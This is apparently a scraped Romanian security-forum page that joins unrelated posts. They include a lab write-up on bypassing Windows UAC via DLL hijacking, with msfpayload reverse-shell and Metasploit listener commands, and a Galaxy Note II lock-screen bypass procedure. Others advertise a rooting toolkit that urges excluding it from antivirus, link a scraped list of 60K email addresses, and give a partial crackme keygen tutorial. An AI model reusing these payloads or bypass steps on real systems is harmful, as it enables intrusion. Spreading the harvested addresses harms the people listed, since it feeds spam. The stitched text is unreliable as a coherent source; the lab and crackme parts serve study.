Nytro

[h=2]UAC Impact on Malware[/h]Monday, March 4, 2013 Posted by Corey Harrell The User Account Control (UAC) is a feature in Windows where every application ran under an administrator user account only runs in the context of a standard user. UAC not only has an impact on the tools we use as I discussed before but it has the same impact on tools used by others such as malware. Recently, I’ve been doing work involving client-side exploits when I was reading a recipe about using Metasploit to take advantage of the way some applications loads external libraries on the Windows operating system. It reminded me about something I read about the ZeroAcess Trojan. How ZeroAccess will leverage the DLL search order vulnerability to bypass the restrictions enforced by UAC. In this post I’m having a little fun by demonstrating the impact UAC has on malware and how effective the DLL search order exploit is for bypassing UAC. The following are the sections for this post: - What is UAC - DLL Search Order Vulnerability - ZeroAccess’s Method to Bypass UAC - Metasploit Setup - Restrictions Enforced by UAC - Bypassing UAC - Summary [h=2]What is UAC[/h] As I mentioned previously, UAC was first introduced with Windows Vista and the feature carried over to Windows 7. By default, UAC is turned on in both operating systems. “The primary goal of User Account Control is to reduce the exposure and attack surface of the Windows 7 operating system by requiring that all users run in standard user mode, and by limiting administrator-level access to authorized processes.” This is a pretty significant feature as it relates to malware. Over the years people have grown accustomed to using user accounts with local administrator privileges on their Windows systems. It even reached a point to where certain applications don’t function properly without these elevated rights. The issue with doing everyday tasks with administrative privileges is that any application executed by the user also runs with elevated privileges. If malware executed on a system with elevated privileges then it could make changes system wide. What UAC does is to restrict the elevated privileges from applying to every application launched by the user. The impact on malware is pretty significant; it is restricted to the locations on the system where the user account has permissions. In most cases, these areas are the user’s profile and any mapped drives. The malware will no longer have the ability to make system wide changes unless it can elevate its privileges. When faced with an infected system it’s important to check the UAC settings due to the potential impact UAC has on malware. The Microsoft article UAC Group Policy Settings and Registry Key Settings outlines the UAC registry settings and the uac RegRipper plugin can extract this information. Below is the output from the uac plug-in when UAC is turned on with the default settings (when UAC is off the EnableLUA and ConsentPromptBehaviorAdmin values are both set to zero): C:\>rip.exe –p uac –r C:\uac\on\Software uac v.20130213 (Software) Get Select User Account Control (UAC) Values UAC Information Microsoft\Windows\CurrentVersion\policies\system LastWrite Time Wed Feb 13 18:39:29 2013 (UTC) EnableLUA value = 1 User Account Control: Run all administrators in Admin Approval Mode 0 = Disabled 1 = Enabled (Default) EnableVirtualization value = 1 User Account Control: Virtualize file and registry write failures to per-user locations 0 = Disabled 1 = Enabled (Default) FilterAdministratorToken value = 0 User Account Control: Admin Approval Mode for the built-in Administrator account 0 = Disabled (Default) 1 = Enabled ConsentPromptBehaviorAdmin value = 5 User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode 0 = Elevate without prompting 1 = Prompt for credentials on the secure desktop 2 = Prompt for consent on the secure desktop 3 = Prompt for credentials 4 = Prompt for consent 5 = Prompt for consent for non-Windows binaries (Default) ConsentPromptBehaviorUser value = 3 User Account Control: Behavior of the elevation prompt for standard users 0 = Automatically deny elevation requests 1 = Prompt for consent on the secure desktop 3 = Prompt for consent on the secure desktop (Default) [h=2]DLL Search Order Vulnerability[/h] The dynamic-link library (DLL) search order vulnerability is well known and has been extensively discussed. Three years ago Mandiant wrote about the weakness in the post Malware Persistence without the Windows Registry. The ISC Diary chimed in on the issue with their post DLL hijacking vulnerabilities. These are only two articles out of many so I’m only briefly touching on the vulnerability. The vulnerability exists because Windows searches for a DLL in a specific order when an application tries to load a DLL. The directories searched are the following in this order: directory from which applications loaded, system directory, Windows directory, current directory, and the directories that are listed in the PATH environment variable. The vulnerability is an application could load a malicious DLL - if the DLL has the same name as one that gets loaded - if the DLL is located in a directory that is searched before the directory containing the legitimate DLL ZeroAccess’s Method to Bypass UAC UAC restricts the elevated privileges from applying to every application launched by the user which significantly impacts malware. The ZeroAccess Rootkit bypasses UAC using a clever technique. The Sophos ZeroAccess Rootkit Report described the technique as follows: “ZeroAccess must elevate its privileges to install successfully, but in order to do this from a non-administrator account on UAC enabled versions of Windows, a UAC popup will appear. End users are more likely to be suspicious of a file they have just downloaded from the internet that they thought was an illegal keygen, crack or hacked version of a game; they may also be suspicious if an unknown exe file causes a UAC popup while the user is browsing the web (exploit pack infection vector). As a result the user may choose not to allow the program to proceed, thus ZeroAccess installation may fail. To bypass this possible problem, ZeroAccess disguises itself by forcing the UAC popup to appear to come from a different, benign-seeming program. A clean copy of the Adobe Flash Installer (InstallFlashPlayer.exe) is dropped to a temporary directory and the DLL load order of Windows is abused to ensure that ZeroAccess is loaded into the clean file’s process address space when it is executed. By dropping a DLL called msimg32.dll (one of the DLLs that InstallFlashPlayer.exe imports) into the same directory as the Flash installer file, Windows will load this DLL in preference to the genuine msimg32.dll because Windows looks in the current directory before the system directory when loading DLLs:” I executed a Flash installer file from the Temp folder and the search order for the msimg32.dll was: LdrLoadDll ( "C:\Users\lab\AppData\Local\Temp;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\", 0x0028fa78, 0x0028fa64, 0x0028fa7c ) As can be seen the folder where the application loaded from (Temp) was checked before the C:\Windows\system32 directory where the msimg32.dll is actually located. [h=2]Metasploit Setup[/h] The ZeroAccess Rootkit uses a mixture of social engineering and the DLL search order vulnerability to bypass the UAC feature. Metasploit was my go to tool to demonstrate UAC’s impact on malware and to verify how effective the DLL search order exploit is for bypassing the feature. For those solely interested in the testing skip ahead to Restrictions Enforced by UAC section. For completeness and those who want to replicate my testing I’m providing the information about my Metasploit setup. My setup involved: create a custom executable to UAC’s restrictions on privileges, create custom DLL to bypass UAC with, and set up Metasploit listener for the reverse connections. My network configuration was Windows 7 and BackTrack virtual machines both connected to a virtual network. After I created the custom reverse shells I manually copied them over to the Windows 7 virtual machine for execution. [h=3]Create Custom Executable[/h] I built the custom executable with msfpayload and used the following command. root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.71.128 LPORT=4444 X >./msimg32.exe [h=3]Create Custom DLL[/h] I built the custom DLL with pretty much the same command but I replaced the X with a D as shown below. root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.71.128 LPORT=4444 D >./msimg32.dll [h=3]Set up Metasploit Listener[/h] The payload I selected for the custom executable and DLL were reverse shells. Their purpose is to establish command shells back to my BackTrack VM at IP address 192.168.71.128 on port 4444. The following are the commands I used to setup the Metasploit listener (notice the listener uses the same payload, IP address, and port number as the custom executable/DLL) msf > use exploit/multi/handler msf exploit(handler) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf exploit(handler) > set LHOST 192.168.71.128 LHOST => 192.168.71.128 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.71.128:4444 [*] Starting the payload handler... [h=2]Restrictions Enforced by UAC[/h] It’s always helpful to first see things as they should be. The first test was to examine the privileges restrictions imposed by UAC to see firsthand its impact on malware from the attackers’ perspective. I manually copied the msimg32.exe to the C:\Users\lab\AppData\Local\Temp directory on the Windows 7 VM and then executed it. On the BackTrack VM I got a successful shell as shown below: [*] Command shell session 1 opened (192.168.71.128:4444 -> 192.168.71.130:49157) at 2013-02-14 21:12:46 -0500 I dropped into the shell and executed the whoami command to see what privileges I had. C:\Users\lab\AppData\Local\Temp>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============= =============================== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled The output showed the shell was running under standard user mode since certain administrative privileges were missing such as the SeTakeOwnershipPrivilege privilege. I next took the testing one step forward by trying to create a file in the System32 directory but was denied access as shown below: C:\Users\lab\AppData\Local\Temp>echo hello > C:\Windows\System32\hello.txt echo hello > C:\Windows\System32\hello.txt Access is denied. Bypassing UAC The restricted privileges imposed by UAC was expected and matched my previous testing. I restored the Windows 7 VM to a snapshot in a clean state and copied the msimg32.dll and a Flash Installer file to the C:\Users\lab\AppData\Local\Temp directory. I executed the Flash installer file (InstallFlashPlayer.exe) by double clicking it and was greeted with the UAC popup. Notice how the verified publisher shows Adobe Systems Incorporated. After I clicked Yes to allow the program to make changes to the system on the BackTrack VM I got a successful shell as shown below. This means the msimg32.dll in the Temp directly was loaded before the legitimate DLL in the System32 directory. [*] Command shell session 2 opened (192.168.71.128:4444 -> 192.168.71.130:49157) at 2013-02-14 21:18:28 -0500 I dropped into the shell and executed the whoami command to see what privileges I had. C:\Users\lab\AppData\Local\Temp>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ====== ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeSecurityPrivilege Manage auditing and security log Disabled SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeSystemProfilePrivilege Profile system performance Disabled SeSystemtimePrivilege Change the system time Disabled SeProfileSingleProcessPrivilege Profile single process Disabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled SeCreatePagefilePrivilege Create a pagefile Disabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeDebugPrivilege Debug programs Disabled SeSystemEnvironmentPrivilege Modify firmware environment values Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled SeUndockPrivilege Remove computer from docking station Disabled SeManageVolumePrivilege Perform volume maintenance tasks Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled SeCreateSymbolicLinkPrivilege Create symbolic links Disabled The output showed the shell was running under administrator mode confirming UAC was successfully bypassed. Again, I took the testing one step forward by successfully creating a file in the System32 directory (notice the access denied message didn’t appear). C:\Users\lab\AppData\Local\Temp>echo hello > C:\Windows\System32\hello.txt echo hello > C:\Windows\System32\hello.txt C:\Users\lab\AppData\Local\Temp> Summary When confronted with examining a system impacted by malware it is important to know what user account was involved and what privileges the account had. If the account is an administrator on a Windows Vista or newer operating system then the next check should be to determine the UAC settings. UAC is the difference between malware being able to make changes system wide or being restricted to a user profile. That is unless the malware leverages a technique to bypass the UAC feature. Then all bets are off. Sursa: Journey Into Incident Response: UAC Impact on Malware

[h=1][sAMSUNG GALAXY S3 UNIFIED TOOLKIT V7.0] Drivers, Backup, Root, Recovery + MORE [GSM][/h] INTRODUCING THE SAMSUNG GALAXY S3 UNIFIED TOOLKIT IMPORTANT: THIS TOOLKIT SUPPORTS 14 DIFFERENT S3 VARIANTS AT THE MOMENT SO MAKE SURE YOU SELECT THE CORRECT MODEL FOR YOUR DEVICE IN THE MODEL SELECTION SCREEN OR INCORRECT RECOVERY/BOOT IMAGES WILL BE DOWNLOADED WHICH COULD SOFT BRICK YOUR DEVICE. Quote: [TABLE] [TR] [TD=class: alt2, bgcolor: #E9E9E9] SUPPORTED MODELS INTERNATIONAL [GT-I9300] SUPPORT THREAD HERE AUSTRALIAN MODEL GSM [GT-I9300T] INTERNATIONAL [GT-I9305/GT-I9305N] SUPPORT THREAD HERE AUSTRALIAN MODEL LTE [GT-I9305T] C SPIRE MODEL LTE [sCH-L710] AT&T US [sGH-I747] SUPPORT THREAD HERE BELL, ROGERS, SASKTEL, TELUS [sGH-I747M] [sGH-I747M] USE AT&T SUPPORT THREAD US CELLULAR MODEL LTE [sCH-R530] USE AT&T SUPPORT THREAD METRO PCS MODEL LTE [sCH-R530M] USE AT&T SUPPORT THREAD SPRINT US [sPH-L710] SUPPORT THREAD HERE TMOBILE US [sGH-T999] SUPPORT THREAD HERE MOBILICITY, VIDEOTRON, WIND [sGH-T999V] USE TMOBILE SUPPORT THREAD VERIZON US [sCH-I535] SUPPORT THREAD HERE [/TD] [/TR] [/TABLE] FUNCTIONS OF SAMSUNG GALAXY S3 UNIFIED TOOLKIT V7.0 [10TH JANUARY 2013] Install drivers automatically Backup/Restore a single package or all apps, user data and Internal Storage Backup your /data/media (virtual SD Card) to your PC for a Full Safe backup of data Perform a FULL NANDROID Backup of your system via adb and save in Custom Recovery format on your PC Pull /data and /system folders, compress to a .tar file and save to your PC Auto Update ToolKit to latest push version on startup (donator feature) Backup/Restore your /efs partition Dump selected Phone Partitions, compress to a .zip file with md5 and save to your PC Install BusyBox binary on phone Root any public build INCLUDING JELLY BEAN (different options available) Root with Superuser (ChainsDD) or SuperSU (Chainfire) via CWM (works on ANY build) Flash Stock Recovery Install any zip file via Sideload feature in Recovery Flash CWM Touch Recovery (thanks to TeamEpic) or CF-CWM Recovery (thanks to Chainfire) Rename Recovery Restore files if present Flash Insecure Boot Image for adb mode Flash Stock Boot Image back to your phone Create tar file to flash via Odin with 1-click process Download, Extract and Flash Stock Rom (full DETAILED steps) ESSENTIAL FOR WARRANTY RETURNS Rip cache.img to zip file in CWM format for editing and flashing (thanks to Adam Lange) Install a single apk or multiple apk's to your phone Push Files from your PC to your phone Pull Files from your phone to your PC Set Files Permissions on your phone Dump selected LogCat buffers to your PC Dump BugReport to your PC (if installed) Help, Information Screen for various tasks Mods Section to Modify your phone Reboot Phone options in adb mode Change background, text colour in ToolKit Activate Donator features from within the ToolKit -------------------------------------------------------------- **CLICK HERE TO DOWNLOAD THE SAMSUNG GALAXY S3 TOOLKIT V7.0** INCLUDES MODSSECTION V3.0 Mirror (MediaFire) of V7.0 being uploaded NOTE: As this update is soo big and pretty much every file from previous versions has changed an Auto Update to V7.0 is not possible because the update would be the same size as the full download and I am not permitted to host that size file on my server. Please download and install the full version from the link above. Donator codes will still work on the current version and enable future Auto Updates and donator features. NOTE: As the exe files are not Digitally Signed with a Microsoft Certificate they 'may' get picked up as potentially harmful by Antivirus Programs and deleted on first run. If this happens restore the file and exclude it from future scans to use it. This seems to happen mostly on AVG Free and Norton which is why I switched to BitDefender which is much better. IMPORTANT: ONLY FLASH ROMS THAT ARE SPECIFICALLY MADE FOR YOUR PHONES MODEL NUMBER AS FLASHING AN INCORRECT ROM CAN POTENTIALLY BRICK YOUR DEVICE! Credits: ChainsDD for Superuser, Chainfire for SuperSU and modded cwm, koush and the clockworkmod team for cwm touch, twrp team, ausdim for cwm port to I9305 Mai multe si sursa: [sAMSUNG GALAXY S3 UNIFIED TOOLKIT V7.0] Drivers, Backup, Root, Recovery + MORE [GSM] - xda-developers

[h=3]Samsung Galaxy Note II lock screen bypass vulnerability[/h]Posted by: Mohit Kumar onMonday, March 04, 2013 iOS was in the news lately for a series of security mishaps, but this time android back in scene. A security flaw discovered by Terence Eden on the Galaxy Note II with Android 4.1.2 that allows hackers to briefly bypass the phone's lock screen without needing a password. By hitting "emergency call" then "emergency contacts" then holding the home button, the main home screen becomes visible for around a second just enough time to load an app, before reverting back to the lock screen. Not all apps will open in this manner, a demo video shows that Google Play does not respond. Reportedly, Eden contacted Samsung roughly five days ago but has yet to hear back. He said that he has not tested any other Samsung devices to see if they are also affected. The flaw appears to be similar to a screen lock vulnerability in newer Apple devices, including the iPhone 5. Steps to follow: Lock the device with a "secure" pattern, PIN, or password. Activate the screen. Press "Emergency Call". Press the "ICE" button on the bottom left. Hold down the physical home key for a few seconds and then release. The phone's home screen will be displayed - briefly. While the home screen is displayed, click on an app or a widget. The app or widget will launch. If the widget is "direct dial" the phone will start ringing. Using this method it could also be possible to load up email or SMS apps for long enough to get an overview of sensitive messages. Sursa: Samsung Galaxy Note II lock screen bypass vulnerability - Hacking News

Andoird App wiht buttons that link to sites package com.example.packagename; import android.os.Bundle; import android.app.Activity; import android.view.Menu; import android.content.Intent; import android.net.Uri; import android.util.Log; import android.view.View; public class MainActivity extends Activity { public static final String TAG = "app name here"; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); } @Override public boolean onCreateOptionsMenu(Menu menu) { // Inflate the menu; this adds items to the action bar if it is present. getMenuInflater().inflate(R.menu.activity_main, menu); return true; } public void processClick(View display) { int id = display.getId(); switch (id) { case (R.id.displayWebsite): Log.i(TAG, "Loading "); Intent website = new Intent(Intent.ACTION_VIEW, Uri.parse("(insert link here)")); startActivity(website); break; case (R.id.communityDisplay): Log.i(TAG, "Loading "); Intent community = new Intent(Intent.ACTION_VIEW, Uri.parse("(insert link here)"); startActivity(community); break; case (R.id.youtube): Log.i(TAG, "Loading "); Intent channel = new Intent(Intent.ACTION_VIEW, Uri.parse("(insert link here)")); startActivity(channel); break; default: break; } } } Sursa: r00tsecurity -> Source Code Center :: Andoird App wiht buttons that link to sites

[h=3]Jailed cyber criminal hacked into prison computer system from Jail[/h]Posted by: Mohit Kumar onMonday, March 04, 2013 Old habits seem to die hard for a hacker, a cyber criminal who masterminded a £15 million fraud was allowed to join a prison IT class and hacked into the jail’s computer system. Nicholas Webber, serving five years in prison for running an internet crime forum Ghost Market, Which allowed those interested in creating computer viruses, partaking of stolen IDs and enjoying private credit card data to congregate. Webber had been arrested for using fraudulent credit card details to pay for a penthouse suite at the Hilton Hotel in Park Lane, Central London. The incident occurred back in 2011, but it only came to light recently "At the time of this incident in 2011 the educational computer system at HMP Isis was a closed network. No access to personal information or wider access to the internet or other prison systems would have been possible," A spokesman f?r prison t??? the Daily Mail reported. His IT teacher, Michael Fox ,who was employed by Kensington and Chelsea College has now brought a claim for unfair dismissal, saying that it wasn't his fault that Webber ended up in his class. Fox also says he had no idea Webber was a hacker. While the college cleared Fox of committing security breaches, he was made redundant when no alternative work could be found for him. The hack at the prison triggered a security scare during a lesson but it was not immediately clear what information he managed to access. Via: Jailed cyber criminal hacked into prison computer system from Jail - Hacking News

Asta ar explica-o si faptul ca sunt o tona de liste de mail-uri pe aici... Adica ca spammeri sunt multi romani.

Nu sunt prea mari diferentele intre PURE 2.0 si PURE 3.0...

Botan C++ Crypto Algorithms Library 1.10.5 Site botan.randombit.net Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. Changes: A previously conditional operation in Montgomery multiplication and squaring is now always performed, removing a possible timing channel. A potential crash in the AES-NI implementation of the AES-192 key schedule (caused by misaligned loads) has been fixed. The correct flags for creating a shared library on OS X under Clang are now used, and a compile time incompatibility with Visual C++ 2012 has been fixed. Download: http://packetstormsecurity.com/files/download/120620/Botan-1.10.5.tgz Sursa: Botan C++ Crypto Algorithms Library 1.10.5 ? Packet Storm

Niciun limbaj nu este de programare: HTML : Markup CSS : Markup PHP : Scripting MySql : SGBD Javascript : Scripting Muie.

In cazul Red October cei de la Kaspersky au scris ca Romania e pe lista tarilor atacate si au multumit CERT-RO pentru colaborare. De asemenea, in lista de fisiere analizate de ei, erau vreo 2 care aveau nume romanesti. Da, nu inteleg ce ar putea vrea cineva de la noi. Oricum acces la institutiile noastre de 2 lei se poate obtine rapid printr-un SQLI de cacat, nu vad de ce s-ar complica atat.

Are cineva un sample de MiniDuke sa ne uitam peste el?

Mail List RO - 60K L-am gasit din intamplare pe scribd. Download: http://www.speedyshare.com/gV47E/72499008-A-a-A.txt PS: Sunt mici probleme de formatare in unele locuri, va descurcati voi.

Nu mai urat ca fiuto sau fieta, ce-o fi.

Eu NU recomand "C++ for dummies" in caz ca se gaseste cineva incepator care vrea sa invete. Explicatiile cu "To press # you must hold Shift button and press button 3" m-au lasat fara cuvinte.

Se face prea mult tam-tam pentru niste porcarii dinastea...

Muie Google

[h=2]Keygenning ESET’s CONfidence 2012 Crackme[/h] [h=4]Intro[/h] Hi again. First, sorry for delaying this post so much, but i am currently so busy, that barly i am finding time for something more than neccessities. Anyways, i dont forget what i promiss, so here comes the post about keygenning the CONfidence 2012 Crackme… In contrary to my previous post (focused on obtaining the key) now i will focus on analysis of the obfuscated algorithm used in generating MMX instructions. I assume, that you read my previous post, so if not – please refer to it. If you don’t care about tutorial, just want to see the keygen – it’s here: Keygen.cpp Keygen.exe* * requires: Microsoft Visual C++ 2008 Redistributable Package [h=4]Tools used[/h] ImmunityDbg (for it’s very useful & handy feature, which i will use a lot in deobfuscating – from context menu : Analysis -> During next analysis treat selection as -> Commands) [h=4]Analysis [/h] As we know, the MMX instructions are stored in a piece of memory starting at 403090. Generation of MMX instructions comes directly before the call to it, so it’s easy to spot. Before, the piece of memory from 403090 to 4044d0 is cleared (with RtlZeroMemory). Pay attention at arguments, which are passed to the generating function (40118A). Content of EBX is pretty obvious – it is a pointer to the memory to be filled (304090). But in ESI there is 403000 and it means… The piece of memory, where the hashes are stored. From 403000 to 40300f there is a copy of hash#1 (md5 of the given username). It is important information – this hash will be used in generating MMX instructions. So, lets follow inside the generating function. Before the user-specific instructions will be genetated, first the MMX prolog is decrypted. Six dwords, stored at memory addresses from 417a8 are XOR-ed with 45534554. And the result is: Looks familiar? Yeah, it was easy, but now the real fun begins… Some initial values are set. ECX = 100h = 256… If you remember, there are 256 blocks of MMX instructions, so it may have something to deal with it… Then it comes to processing of the hash#1. This part is slightly obfuscated, so i will explain it. 004010B6 $ 56 PUSH ESI 004010B7 . 52 PUSH EDX 004010B8 . 8B7424 0C MOV ESI,DWORD PTR SS:[ESP+C] ; Unpacked.00403000 004010BC . 8B16 MOV EDX,DWORD PTR DS:[ESI] ; EDX = DS:[403000] 004010BE . 81E2 87000000 AND EDX,87 004010C4 . 0F9BC2 SETPO DL [...] 004010EA . 33C0 XOR EAX,EAX 004010EC . D126 SHL DWORD PTR DS:[ESI],1 004010EE . D156 04 RCL DWORD PTR DS:[ESI+4],1 [...] 004010F6 > D156 08 RCL DWORD PTR DS:[ESI+8],1 004010F9 . D156 0C RCL DWORD PTR DS:[ESI+C],1 [...] 0040111A > 13C0 ADC EAX,EAX 0040111C . 33C2 XOR EAX,EDX 0040111E . 0906 OR DWORD PTR DS:[ESI],EAX 00401120 . 5A POP EDX 00401121 . 5E POP ESI 00401122 . C2 0400 RETN 4 As we see, the piece of memory containing hash#1 is modified after each execution of those instructions. Value of EAX is modified – it changes according to the content of memory at 403000 – that’s how the value of hash influences the process of generating MMX instructions. But obviously, we need to know details… The question is, how exectly every MMX instruction is generated and what is the connection between it and the hash/processed hash? The previously described function is called twice. The result of first call is stored in EDX. (I will denote this function as get_cmd_base). 00401125 $ 52 PUSH EDX 00401126 . 56 PUSH ESI 00401127 . 8B7424 0C MOV ESI,DWORD PTR SS:[ESP+C] ; ESI = 403000 0040112B > 51 PUSH ECX ; bgn#1 [...] 0040114C . 59 POP ECX 0040114D . 56 PUSH ESI 0040114E . E8 63FFFFFF CALL Unpacked.004010B6 ; modify memory at 403000 00401153 . 8BD0 MOV EDX,EAX ; EAX = result of function at 4010B6 00401155 . 56 PUSH ESI 00401156 . E8 5BFFFFFF CALL Unpacked.004010B6 ; modify (again) memory at 403000 0040115B . 8D0450 LEA EAX,DWORD PTR DS:[EAX+EDX*2] [...] 00401181 . 85C0 TEST EAX,EAX 00401183 >^74 A6 JE SHORT Unpacked.0040112B ; ;goto #bgn1 00401185 . 5E POP ESI 00401186 . 5A POP EDX 00401187 . C2 0400 RETN 4 Then, the first result is multiplied by 2 and added to second result in EAX. DWORD get_cmd_base(BYTE *hashBuffer) { DWORD eax, edx; do { edx = process_hash(hashBuffer); eax = process_hash(hashBuffer); eax = eax + edx * 2; } while (eax == 0); return eax; } What are the possible valueas of EAX? EAX = EAX + EDX * 2 where right side EAX and EDX are results from 403000 modifying function. So, EAX, EDX can take a value either 0 or 1. Means left side EAX (res) is: | EAX | EDX | res | ------------------- | 0 | 0 | 0 | | 1 | 0 | 1 | | 0 | 1 | 2 | | 1 | 1 | 3 | ------------------- If EAX == 0, then everything is repeated once again – (after some obfuscation) we go back to the same piece of code. If EAX != 0, then instruction is generated on its base. Below is how the first instruction comes. The first instruction is MOVQ [MM6/MM7], [MM0/MM1] 0040120A > 56 PUSH ESI 0040120B . E8 15FFFFFF CALL Unpacked.00401125 00401210 . D1E8 SHR EAX,1 00401212 . F7D8 NEG EAX 00401214 . 83E0 01 AND EAX,1 [...] 0040122B > 8BEB MOV EBP,EBX [...] 0040124B > 81E5 00070000 AND EBP,700 00401251 . C1ED 05 SHR EBP,5 00401254 . 81CD C6000000 OR EBP,0C6 0040125A . 33E8 XOR EBP,EAX [...] 0040147D $ 8BC5 MOV EAX,EBP 0040147F . C1E0 18 SHL EAX,18 [...] 004014A5 . 0D CC0F7F00 OR EAX,7F0FCC ; MOVQ MMx, MMy 004014AA . C1C8 08 ROR EAX,8 004014AD . 8907 MOV DWORD PTR DS:[EDI],EAX 004014AF . 83C7 03 ADD EDI,3 [...] 004014D0 > 8BC3 MOV EAX,EBX 004014D2 . C1E8 1F SHR EAX,1F 004014D5 . 33D8 XOR EBX,EAX 004014D7 . C3 RETN The first out of 6 instructions is generated… And then, generating next instruction: MOVQ [MM7/MM6],[MM2/MM3/MM4/MM5]. The choise of first register depends on the perevious. if previuosly we had MOVQ MM6,[...] now there must be MOV MM7,[...]. The second choise is independent. 00401284 . 81CB 00000080 OR EBX,80000000 [...] 004012A8 > 8BC3 MOV EAX,EBX 004012AA . 83E0 07 AND EAX,7 004012AD . C1E0 03 SHL EAX,3 004012B0 . 81E5 C7000000 AND EBP,0C7 004012B6 . 0BE8 OR EBP,EAX 004012B8 . 83F5 01 XOR EBP,1 [...] 0040147D $ 8BC5 MOV EAX,EBP 0040147F . C1E0 18 SHL EAX,18 [...] 004014A5 . 0D CC0F7F00 OR EAX,7F0FCC ; MOVQ MMx, MMy 004014AA . C1C8 08 ROR EAX,8 004014AD . 8907 MOV DWORD PTR DS:[EDI],EAX 004014AF . 83C7 03 ADD EDI,3 [...] 004014D0 > 8BC3 MOV EAX,EBX 004014D2 . C1E8 1F SHR EAX,1F 004014D5 . 33D8 XOR EBX,EAX 004014D7 . C3 RETN The second out of 6 instructions… Third instruction: As we know, 3-rd, 4-ty and 5-th instructions are various. Here we see from where this variety comes. The call to an instruction generating procedure is done to various places in memory, depeending on EAX. 004012DE > 56 PUSH ESI ; Unpacked.00403000 004012DF . E8 41FEFFFF CALL Unpacked.00401125 [...] 00401307 . 8BEB MOV EBP,EBX 00401309 . 83E5 07 AND EBP,7 0040130C . 81CD F0000000 OR EBP,0F0 00401312 . FF1485 6D14400>CALL DWORD PTR DS:[EAX*4+40146D] 00401319 . E8 07000000 CALL Unpacked.00401325 ; //after #3 EAX = {1, 2, 3} [EAX*4+40146D] = {401471, 401475, 401479} EAX = 1 -> call 4015A6 EAX = 2 -> call 4016C3 EAX = 3 -> call 4014D8 As we see, in each of these 3 cases, the function at 401125 is called. It leads, after some obfuscation, again to 40114D (described above, which result is “res”). Then, the “res” is used in further operations. After deobfuscation it is: If EAX = 1 004015A6 $ 56 PUSH ESI ; Unpacked.00403000 004015A7 . E8 79FBFFFF CALL Unpacked.00401125 004015AC . 8AE0 MOV AH,AL 004015AE . 80E4 01 AND AH,1 004015B1 . C0E4 04 SHL AH,4 004015B4 . 80CC EF OR AH,0EF [...] 004015DA . 8AD0 MOV DL,AL 004015DC . 80E2 02 AND DL,2 004015DF . D0E2 SHL DL,1 004015E1 . 80CA FB OR DL,0FB [...] 00401602 > 22D4 AND DL,AH [...] 00401618 > 8AF0 MOV DH,AL 0040161A . 80E6 01 AND DH,1 0040161D . F6DE NEG DH [...] 00401642 . 56 PUSH ESI 00401643 . E8 DDFAFFFF CALL Unpacked.00401125 00401648 . 22F0 AND DH,AL 0040164A . 32D6 XOR DL,DH [...] 0040166A > 8BC5 MOV EAX,EBP 0040166C . 0FB6D2 MOVZX EDX,DL 0040166F . 0FB6C0 MOVZX EAX,AL 00401672 . C1E0 10 SHL EAX,10 00401675 . C1E2 08 SHL EDX,8 [...] 00401691 > 33C2 XOR EAX,EDX 00401693 . 35 0F0000CC XOR EAX,CC00000F 00401698 . 8907 MOV DWORD PTR DS:[EDI],EAX 0040169A . 83C7 03 ADD EDI,3 [...] 004016BB > 8BC3 MOV EAX,EBX 004016BD . C1E8 1F SHR EAX,1F 004016C0 . 33D8 XOR EBX,EAX 004016C2 . C3 RETN If (EAX = 2): 004016C3 $ 51 PUSH ECX 004016C4 . 56 PUSH ESI 004016C5 . E8 5BFAFFFF CALL Unpacked.00401125 004016CA . 8AC8 MOV CL,AL [...] 004016D1 > 80E1 01 AND CL,1 004016D4 . B4 01 MOV AH,1 004016D6 . D2E4 SHL AH,CL 004016D8 . F6D4 NOT AH 004016DA . C0C4 04 ROL AH,4 [...] 00401700 24 02 AND AL,2 00401702 F6D0 NOT AL 00401704 D0C0 ROL AL,1 00401706 22E0 AND AH,AL [...] 0040172B 8BCD MOV ECX,EBP 0040172D 25 00FF0000 AND EAX,0FF00 00401732 0FB6C9 MOVZX ECX,CL 00401735 C1E1 10 SHL ECX,10 00401738 0BC1 OR EAX,ECX 0040173A 35 0F0000CC XOR EAX,CC00000F [...] 0040175D > 8907 MOV DWORD PTR DS:[EDI],EAX 0040175F . 83C7 03 ADD EDI,3 00401762 . 8BC3 MOV EAX,EBX 00401764 . C1E8 1F SHR EAX,1F 00401767 . 33D8 XOR EBX,EAX 00401769 . 59 POP ECX 0040176A . C3 RETN If (EAX =3) 004014D8 $ 56 PUSH ESI 004014D9 . E8 47FCFFFF CALL Unpacked.00401125 [...] 004014DE . D0E8 SHR AL,1 004014E0 . 8AD0 MOV DL,AL 004014E2 . C0E2 05 SHL DL,5 [...] 00401503 > 56 PUSH ESI ; Unpacked.00403000 00401504 . E8 1CFCFFFF CALL Unpacked.00401125 00401509 . 8AF0 MOV DH,AL 0040150B . 8BC5 MOV EAX,EBP 0040150D . C0E8 03 SHR AL,3 [...] 00401533 